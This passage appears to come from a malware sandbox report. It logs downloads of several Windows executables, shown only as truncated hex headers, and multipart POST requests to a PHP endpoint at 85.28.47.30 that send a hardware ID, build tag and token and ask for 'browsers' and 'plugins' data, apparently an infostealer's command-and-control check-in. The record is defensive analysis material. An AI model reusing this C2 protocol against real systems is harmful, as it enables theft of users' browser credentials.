Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 05 Jul 2024 04:23:07 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "94750-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 05 Jul 2024 04:23:08 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "6dde8-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 05 Jul 2024 04:23:08 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "1f3950-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 05 Jul 2024 04:23:10 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "3ef50-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 05 Jul 2024 04:23:11 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "13bf0-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 05 Jul 2024 04:23:14 GMTContent-Type: application/octet-streamContent-Length: 1901056Last-Modified: Fri, 05 Jul 2024 04:04:33 GMTConnection: keep-aliveETag: "668770d1-1d0200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 cc 13 50 4a 88 72 3e 19 88 72 3e 19 88 72 3e 19 d3 1a 3d 18 86 72 3e 19 d3 1a 3b 18 28 72 3e 19 5d 1f 3a 18 9a 72 3e 19 5d 1f 3d 18 9e 72 3e 19 5d 1f 3b 18 fd 72 3e 19 d3 1a 3a 18 9c 72 3e 19 d3 1a 3f 18 9b 72 3e 19 88 72 3f 19 5e 72 3e 19 13 1c 37 18 89 72 3e 19 13 1c c1 19 89 72 3e 19 13 1c 3c 18 89 72 3e 19 52 69 63 68 88 72 3e 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 84 ea 61 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 e4 04 00 00 c6 01 00 00 00 00 00 00 40 4b 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 70 4b 00 00 04 00 00 90 3d 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 58 a0 06 00 6c 00 00 00 00 90 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 26 4b 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 98 26 4b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 dc 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 90 06 00 00 02 00 00 00 ec 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 90 2a 00 00 b0 06 00 00 02 00 00 00 f0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 72 78 63 65 6f 6f 6e 79 00 f0 19 00 00 40 31 00 00 ea 19 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 7a 77 71 6a 6f 74 6d 6b 00 10 00 00 00 30 4b 00 00 04 00 00 00 dc 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 40 4b 00 00 22 00 00 00 e0 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KFIJJEGHDAEBGCAKJKFHHost: 85.28.47.30Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 46 49 4a 4a 45 47 48 44 41 45 42 47 43 41 4b 4a 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 45 38 33 38 42 38 31 41 43 33 41 34 30 34 33 37 32 38 33 35 34 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 49 4a 4a 45 47 48 44 41 45 42 47 43 41 4b 4a 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 4e 69 63 65 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 49 4a 4a 45 47 48 44 41 45 42 47 43 41 4b 4a 4b 46 48 2d 2d 0d 0a Data Ascii: ------KFIJJEGHDAEBGCAKJKFHContent-Disposition: form-data; name="hwid"7E838B81AC3A4043728354------KFIJJEGHDAEBGCAKJKFHContent-Disposition: form-data; name="build"Nice------KFIJJEGHDAEBGCAKJKFH--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CFHDHIJDGCBAKFIEGHCBHost: 85.28.47.30Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 46 48 44 48 49 4a 44 47 43 42 41 4b 46 49 45 47 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 39 33 61 66 35 32 64 66 64 61 64 65 33 64 31 36 66 62 66 33 64 64 64 62 66 36 64 62 64 63 36 63 36 62 64 36 31 33 64 62 35 63 39 62 62 39 36 65 31 34 34 31 39 64 38 36 39 64 66 36 30 62 30 62 33 34 62 61 33 66 37 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 44 48 49 4a 44 47 43 42 41 4b 46 49 45 47 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 44 48 49 4a 44 47 43 42 41 4b 46 49 45 47 48 43 42 2d 2d 0d 0a Data Ascii: ------CFHDHIJDGCBAKFIEGHCBContent-Disposition: form-data; name="token"d93af52dfdade3d16fbf3dddbf6dbdc6c6bd613db5c9bb96e14419d869df60b0b34ba3f7------CFHDHIJDGCBAKFIEGHCBContent-Disposition: form-data; name="message"browsers------CFHDHIJDGCBAKFIEGHCB--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IECBAFCAAKJDHJKFIEBGHost: 85.28.47.30Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 45 43 42 41 46 43 41 41 4b 4a 44 48 4a 4b 46 49 45 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 39 33 61 66 35 32 64 66 64 61 64 65 33 64 31 36 66 62 66 33 64 64 64 62 66 36 64 62 64 63 36 63 36 62 64 36 31 33 64 62 35 63 39 62 62 39 36 65 31 34 34 31 39 64 38 36 39 64 66 36 30 62 30 62 33 34 62 61 33 66 37 0d 0a 2d 2d 2d 2d 2d 2d 49 45 43 42 41 46 43 41 41 4b 4a 44 48 4a 4b 46 49 45 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 49 45 43 42 41 46 43 41 41 4b 4a 44 48 4a 4b 46 49 45 42 47 2d 2d 0d 0a Data Ascii: ------IECBAFCAAKJDHJKFIEBGContent-Disposition: form-data; 